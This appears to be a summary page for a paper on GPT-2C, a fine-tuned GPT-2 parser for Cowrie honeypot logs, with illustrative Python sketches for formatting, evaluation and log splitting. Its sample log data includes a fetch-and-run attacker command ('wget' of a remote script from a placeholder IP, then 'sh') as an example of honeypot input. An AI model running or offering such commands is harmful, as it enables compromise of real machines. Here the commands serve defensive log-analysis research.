GPT-2C: A GPT-2 parser for Cowrie honeypot logs

Febrian Setianto; Erion Tsani; Fatima Sadiq; Georgios Domalis; Dimitris Tsakalidis; Panos Kostakos

arXiv:2109.06595·cs.CR·September 16, 2021·5 cites

TL;DR

This paper introduces GPT-2C, a system that uses a fine-tuned GPT-2 model to parse dynamic logs from Cowrie SSH honeypots, improving their interoperability with EDR and SIEM tools.

Contribution

The paper presents a novel GPT-2-based parser designed specifically for dynamic honeypot logs, achieving 89% inference accuracy with execution latency acceptable for real-time analysis.
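
One common way to use a causal language model such as GPT-2 as a parser is to serialize each (raw log, structured parse) pair as a single string, fine-tune on those strings, and at inference time let the model complete the parse after a separator. The sketch below shows only that text plumbing. The separator ` => ` and the label `download` are hypothetical choices for illustration, not the format GPT-2C uses; only `<|endoftext|>` is GPT-2's actual end-of-text token.

```python
# Hypothetical text format for treating log parsing as text generation.
# EOS is GPT-2's real end-of-text token; SEP and the labels are assumptions.
EOS = "<|endoftext|>"
SEP = " => "  # hypothetical separator between raw log text and its parse


def to_training_text(raw: str, parse: str) -> str:
    """Serialize one (raw log, parse) pair as a single fine-tuning example."""
    return f"{raw}{SEP}{parse}{EOS}"


def to_prompt(raw: str) -> str:
    """At inference the model sees only the raw text followed by the separator."""
    return f"{raw}{SEP}"


def extract_parse(generated: str, prompt: str) -> str:
    """Recover the parse from the model output, dropping the echoed prompt
    (if present) and anything generated after the end-of-text token."""
    continuation = generated[len(prompt):] if generated.startswith(prompt) else generated
    return continuation.split(EOS, 1)[0].strip()
```

For example, `to_training_text("wget http://198.51.100.9/x.sh", "download")` yields `wget http://198.51.100.9/x.sh => download<|endoftext|>`, and `extract_parse` applied to that string with the matching prompt returns `download`. Stopping at the end-of-text token keeps the parser from returning text the model generates past the intended answer.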

Findings

1. 89% inference accuracy on honeypot logs
2. Effective parsing of dynamic, user-generated content
3. Acceptable latency for real-time analysis
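
The page does not say how accuracy or latency were measured. The sketch below assumes exact-match accuracy per log line and wall-clock time per parser call, which is one plausible way to obtain figures of this kind. `keyword_parser` and `DATASET` are hypothetical stand-ins for a fine-tuned model and a labelled test set.

```python
import time
from statistics import mean


def evaluate(parser, dataset):
    """Return (exact-match accuracy, mean latency in ms) of `parser` over
    (raw_log, expected_parse) pairs. Exact match is an assumed metric."""
    if not dataset:
        raise ValueError("dataset must not be empty")
    correct = 0
    latencies_ms = []
    for raw, expected in dataset:
        start = time.perf_counter()
        predicted = parser(raw)
        latencies_ms.append((time.perf_counter() - start) * 1000.0)
        correct += int(predicted.strip() == expected.strip())
    return correct / len(dataset), mean(latencies_ms)


def keyword_parser(raw):
    """Hypothetical stand-in for a model: labels a command by its first word."""
    words = raw.split()
    first = words[0] if words else ""
    return {"wget": "download", "curl": "download", "chmod": "permission"}.get(first, "other")


# Hypothetical labelled examples (documentation IP range, RFC 5737).
DATASET = [
    ("wget http://198.51.100.9/x.sh", "download"),
    ("chmod +x x.sh", "permission"),
    ("cd /tmp; ./x.sh", "execute"),
]
```

Running `evaluate(keyword_parser, DATASET)` gives an accuracy of 2/3, because the keyword rule labels the chained `cd /tmp; ./x.sh` as `other`. Compound, user-generated input of this kind is where a learned parser is expected to outperform fixed rules. Swapping in a model-backed parser only requires a callable that maps a raw string to a parse string.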

Abstract

Deception technologies like honeypots produce comprehensive log reports, but often lack interoperability with EDR and SIEM technologies. A key bottleneck is that existing information transformation plugins perform well on static logs (e.g., geolocation), but face limitations when parsing dynamic log topics (e.g., user-generated content). In this paper, we present a run-time system (GPT-2C) that leverages large pre-trained models (GPT-2) to parse dynamic logs generated by a Cowrie SSH honeypot. Our fine-tuned model achieves 89% inference accuracy in the new domain and demonstrates acceptable execution latency.
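
To make the static/dynamic distinction concrete: Cowrie can write one JSON event per line, with fields such as `eventid`, `src_ip`, `session` and, for typed commands, `input`. The sketch below assumes that layout (field sets vary by event type and Cowrie version) and uses made-up sample events. Fixed fields like `src_ip` can be enriched directly, for instance by a geolocation lookup, while the free-form `input` of `cowrie.command.input` events is the dynamic content. `naive_commands` is a hypothetical rule-based splitter included to show how easily fixed rules break on attacker input.

```python
import json

# Made-up sample events in Cowrie's JSON-lines style (documentation IPs, RFC 5737).
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1b2c3"}
{"eventid": "cowrie.login.success", "username": "root", "password": "123456", "src_ip": "203.0.113.7", "session": "a1b2c3"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.9/x.sh; sh x.sh", "src_ip": "203.0.113.7", "session": "a1b2c3"}
"""


def split_events(lines):
    """Separate fixed-schema (static) events from free-form attacker input (dynamic)."""
    static, dynamic = [], []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if event.get("eventid") == "cowrie.command.input":
            # Shell input typed by the attacker: arbitrary, user-generated text.
            dynamic.append(event["input"])
        else:
            # Fixed fields that a plugin can enrich directly (e.g. geolocate src_ip).
            static.append({"eventid": event["eventid"], "src_ip": event.get("src_ip")})
    return static, dynamic


def naive_commands(cmdline):
    """Hypothetical rule: split on ';'. Breaks on quoting, pipes, '&&', etc."""
    return [part.strip() for part in cmdline.split(";") if part.strip()]
```

With `static, dynamic = split_events(SAMPLE_LOG.splitlines())`, the two connection and login events land in `static` and the attacker's command line lands in `dynamic`. `naive_commands` handles that command line, but splits `echo "a;b"` into the broken fragments `echo "a` and `b"`: the kind of edge case that motivates a learned parser for dynamic content.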

Taxonomy

Topics: Software System Performance and Reliability · Software Testing and Debugging Techniques · Network Security and Intrusion Detection